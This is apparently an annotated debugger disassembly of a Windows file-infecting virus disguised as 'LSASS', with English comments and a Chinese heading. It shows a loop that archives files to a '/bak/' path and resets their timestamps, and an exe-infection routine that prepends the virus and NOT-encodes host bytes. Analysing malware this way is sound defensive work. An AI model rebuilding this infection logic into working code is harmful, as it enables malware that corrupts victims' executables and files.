004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]

004027DB |. 57 |PUSH EDI

004027DC |. 50 |PUSH EAX

004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004027E2 |. 51 |PUSH ECX

004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

004027E9 |. 8BCC |MOV ECX,ESP

004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

004027EE |. 52 |PUSH EDX

004027EF |. 50 |PUSH EAX

004027F0 |. 51 |PUSH ECX

004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F

004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004027FA |. 8BCE |MOV ECX,ESI

004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1

00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]

0040280B |. E9 B5020000 |JMP LSASS.00402AC5

00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]

00402815 |. 51 |PUSH ECX

00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX

00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]

0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]

00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX

00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]

0040282A |. 8BCC |MOV ECX,ESP

0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

0040282F |. 50 |PUSH EAX

00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00402835 |. 8BCE |MOV ECX,ESI

00402837 |. E8 85F8FFFF |CALL LSASS.004020C1

0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]

0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX

00402845 |. 7F 4B |JG SHORT LSASS.00402892

00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]

0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX

00402850 |. 7F 40 |JG SHORT LSASS.00402892

00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]

0040285D |. 57 |PUSH EDI

0040285E |. 50 |PUSH EAX

0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402864 |. 51 |PUSH ECX

00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

0040286B |. 8BCC |MOV ECX,ESP

0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402870 |. 52 |PUSH EDX

00402871 |. 50 |PUSH EAX

00402872 |. 51 |PUSH ECX

00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26

00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040287C |. 8BCE |MOV ECX,ESI

0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1

00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]

0040288D |. E9 C000 |JMP LSASS.00402A54

00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]

00402895 |. 50 |PUSH EAX

00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]

0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""

004028A1 |. 50 |PUSH EAX

004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>

004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""

004028AC |. 50 |PUSH EAX

004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]

004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20

004028B4 |. 50 |PUSH EAX

004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21

004028C1 |. 51 |PUSH ECX

004028C2 |. 50 |PUSH EAX

004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]

004028C6 |. 50 |PUSH EAX

004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"

004028D1 |. 50 |PUSH EAX

004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]

004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22

004028D9 |. 50 |PUSH EAX

004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004028DF |. 50 |PUSH EAX

004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]

004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23

004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]

004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22

004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]

004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21

004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]

00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20

0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]

00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]

00402925 |. 53 |PUSH EBX

00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX

00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]

0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX

00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]

00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX

0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]

00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX

00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]

0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX

0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]

00402953 |. 51 |PUSH ECX

00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX

00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

0040295D |. 8BC4 |MOV EAX,ESP

0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402962 |. 51 |PUSH ECX

00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]

00402966 |. 51 |PUSH ECX

00402967 |. 50 |PUSH EAX

00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1

00402972 |. 59 |POP ECX

00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]

00402976 |. 59 |POP ECX

00402977 |. 50 |PUSH EAX

00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]

0040297E |. 50 |PUSH EAX

0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]

00402985 |. 50 |PUSH EAX

00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src

0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

00402993 |. 50 |PUSH EAX ; |dest

00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy

00402999 |. 59 |POP ECX

0040299A |. 59 |POP ECX

0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]

004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004029A6 |. 53 |PUSH EBX ; /Arg5

004029A7 |. 53 |PUSH EBX ; |Arg4

004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004029AE |. 53 |PUSH EBX ; |Arg3

004029AF |. 50 |PUSH EAX ; |Arg2

004029B0 |. 53 |PUSH EBX ; |Arg1

004029B1 |. 8BCE |MOV ECX,ESI ; |

004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB

004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file

004029BA |. 75 5D |JNZ SHORT LSASS.00402A19

004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>

004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"

004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24

004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>

004029D5 |. 53 |PUSH EBX ; /hTemplateFile

004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL

004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING

004029DD |. 53 |PUSH EBX ; |pSecurity

004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName

004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA

004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]

004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX

004029F4 |. 51 |PUSH ECX ; /pLastWrite

004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |

004029F8 |. 51 |PUSH ECX ; |pLastAccess

004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |

004029FC |. 51 |PUSH ECX ; |pCreationTime

004029FD |. 50 |PUSH EAX ; |hFile

004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime

00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject

00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle

00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]

00402A24 |. 57 |PUSH EDI

00402A25 |. 50 |PUSH EAX

00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402A2B |. 51 |PUSH ECX

00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

00402A32 |. 8BCC |MOV ECX,ESP

00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402A37 |. 52 |PUSH EDX

00402A38 |. 50 |PUSH EAX

00402A39 |. 51 |PUSH ECX

00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25

00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402A43 |. 8BCE |MOV ECX,ESI

00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1

00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]

00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]

00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA

00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000

00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA

...

00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]

00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]

00402AD0 |. 50 |PUSH EAX ; /pFindFileData

00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile

00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA

00402ADA |. 85C0 |TEST EAX,EAX

00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234

00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch

00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose

2 感染exe文件的函数

00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; exe file infect function

0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>

00406352 |. 83EC 3C SUB ESP,3C

00406355 |. 53 PUSH EBX

00406356 |. 56 PUSH ESI

00406357 |. 8BF1 MOV ESI,ECX

00406359 |. 57 PUSH EDI

0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>

00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0

00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]

0040636C |. 50 PUSH EAX

0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]

00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48]

0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68]

0040637E |. 50 PUSH EAX ; /statbuf

0040637F |. 57 PUSH EDI ; |path

00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat

00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; get file com/lsass.exe base info

00406389 |. 59 POP ECX

0040638A |. 85C0 TEST EAX,EAX

0040638C |. 59 POP ECX

0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX

00406392 |. 75 07 JNZ SHORT LSASS.0040639B

00406394 |> 32DB XOR BL,BL

00406396 |. E9 13010000 JMP LSASS.004064AE

0040639B |> 50 PUSH EAX ; /size

0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc

004063A2 |. 85C0 TEST EAX,EAX ; allocate a memory

004063A4 |. 59 POP ECX

004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; buf

004063AB |.^ 74 E7 JE SHORT LSASS.00406394

004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"

004063B2 |. 57 PUSH EDI ; |path

004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |msvcrt.fopen

004063B9 |. FFD7 CALL EDI ; /fopen

004063BB |. 59 POP ECX ; open file com/lsass.exe

004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX

004063BF |. 85C0 TEST EAX,EAX

004063C1 |. 59 POP ECX

004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; read file com/lsass.exe to buf

004063C8 |. 50 PUSH EAX ; /stream

004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |msvcrt.fread

004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = 27004 (159748.)

004063D5 |. 6A 01 PUSH 1 ; |size = 1

004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf

004063DD |. FFD3 CALL EBX ; /fread

004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream

004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |

004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose

004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] ; close file handle

004063EE |. 83C4 14 ADD ESP,14

004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]

004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F

004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174]

00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]

00406406 |. 51 PUSH ECX ; /statbuf

00406407 |. 50 PUSH EAX ; |path

00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat

0040640E |. 59 POP ECX ; get need infect file base info to statbuf

0040640F |. 85C0 TEST EAX,EAX

00406411 |. 59 POP ECX

00406412 |. 0F85 74020000 JNZ LSASS.0040668C

00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX

0040641B |. 0F84 6B020000 JE LSASS.0040668C

00406421 |. 8BCE MOV ECX,ESI

00406423 |. E8 DA020000 CALL LSASS.00406702 ; LoadResource here

00406428 |. 84C0 TEST AL,AL

0040642A |. 74 73 JE SHORT LSASS.0040649F

0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; the file can be infected

00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"

00406437 |. 50 PUSH EAX

00406438 |. FFD7 CALL EDI ; open need infect file

0040643A |. 59 POP ECX ; file path

0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; need infect file handle

0040643E |. 85C0 TEST EAX,EAX

00406440 |. 59 POP ECX

00406441 |. 74 5C JE SHORT LSASS.0040649F

00406443 |. 51 PUSH ECX

00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]

0040644A |. 8BCC MOV ECX,ESP

0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP

0040644F |. 50 PUSH EAX

00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; check file whether is infected function

0040645A |. 84C0 TEST AL,AL

0040645C |. 59 POP ECX

0040645D |. 74 1B JE SHORT LSASS.0040647A ; jmp if can infected

0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream

0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose

00406474 |. 59 POP ECX

00406475 |. B3 01 MOV BL,1

00406477 |. 59 POP ECX

00406478 |. EB 34 JMP SHORT LSASS.004064AE

0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET

0040647C |. 6A 00 PUSH 0 ; |offset = 0

0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream

00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek

00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; set need file ptr as 0

0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"

00406492 |. 50 PUSH EAX ; create a temporary file: system32/com/~

00406493 |. FFD7 CALL EDI ; fopen

00406495 |. 83C4 14 ADD ESP,14

00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; com/~ handle

0040649B |. 85C0 TEST EAX,EAX

0040649D |. 75 22 JNZ SHORT LSASS.004064C1

0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

004064A5 |. 32DB XOR BL,BL ; |

004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

004064AD |. 59 POP ECX

004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF

004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004064BA |. 8AC3 MOV AL,BL

004064BC |. E9 E6010000 JMP LSASS.004066A7

004064C1 |> 50 PUSH EAX ; /write self-virus file to temporary file(com/~)

004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |msvcrt.fwrite

004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n

004064CB |. 6A 01 PUSH 1 ; |size = 1

004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr

004064D3 |. FFD7 CALL EDI ; /fwrite

004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX

004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34]

004064DE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~

004064E0 |. 6A 01 PUSH 1

004064E2 |. 50 PUSH EAX

004064E3 |. FFD7 CALL EDI ; fwrite

004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX

004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]

004064EE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~

004064F0 |. 6A 01 PUSH 1

004064F2 |. 50 PUSH EAX

004064F3 |. FFD7 CALL EDI ; fwrite

004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; filestream

004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX

004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1

004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read all need infect file

00406505 |. 6A 01 PUSH 1

00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; rBuf

0040650D |. FFD3 CALL EBX ; fread

0040650F |. 83C4 40 ADD ESP,40 ;

00406512 |> 85C0 /TEST EAX,EAX ; EXA initial value = 0x1c000(need infect file

size)

00406514 |. 0F84 8B000000 |JE LSASS.004065A5

0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; flag

0040651E |. 74 59 |JE SHORT LSASS.00406579

00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; save inital postion to ECX

00406526 |. 83C1 09 |ADD ECX,9 ; ECX += 9; 224

00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C]

0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX

00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; if ECX > [40D03C](self-virus size) then jmp;

00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file

0040653A |. 03CA ||ADD ECX,EDX

0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]

0040653E |. F6D2 ||NOT DL

00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; modified, then save back

00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp

00406545 |. 83C1 0B ||ADD ECX,0B ; ECX += 0x0B; offset = 0x0B

00406548 |.^ EB DF |/JMP SHORT LSASS.00406529

0040654A |> 33C9 |XOR ECX,ECX ; ECX = 0;

0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX

00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;

00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; if [40D03C] <= ECX then jmp;

00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file

0040655D |. 03CA ||ADD ECX,EDX ; ECX += EDX;

0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]

00406561 |. F6D2 ||NOT DL

00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; midified, then save back

00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp;

00406568 |. 41 ||INC ECX

00406569 |. 41 ||INC ECX ; ECX += 2;

0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]

00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;

00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; if ECX < [40D03C](self-virus size) then jmp

(continue decode);

00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; then decode over, write to temporary file

00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; write to file com/~

0040657C |. 50 |PUSH EAX

0040657D |. 6A 01 |PUSH 1

0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

00406585 |. FFD7 |CALL EDI ; fwrite

00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]

0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX

0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]

00406593 |. 6A 01 |PUSH 1

00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

0040659B |. FFD3 |CALL EBX ; fread

0040659D |. 83C4 20 |ADD ESP,20

004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512

004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream

004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose

004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; |

004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb"

004065BB |. 50 PUSH EAX ; |path

004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen

004065C2 |. 59 POP ECX ; open com/lsass.exe

004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; handle

004065C6 |. 85C0 TEST EAX,EAX

004065C8 |. 59 POP ECX

004065C9 |. 0F84 BD000000 JE LSASS.0040668C

004065CF |. 50 PUSH EAX

004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1

004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read com/lsass.exe all

004065DA |. 6A 01 PUSH 1

004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]

004065E2 |. FFD3 CALL EBX ; fread

004065E4 |. 83C4 10 ADD ESP,10

004065E7 |> 85C0 /TEST EAX,EAX

004065E9 |. 74 5E |JE SHORT LSASS.00406649

004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0

004065EF |. 74 2F |JE SHORT LSASS.00406620

004065F1 |. 33C9 |XOR ECX,ECX

004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX

004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX

004065FC |. 76 1E |JBE SHORT LSASS.0040661C

004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]

00406604 |. 03CA ||ADD ECX,EDX

00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]

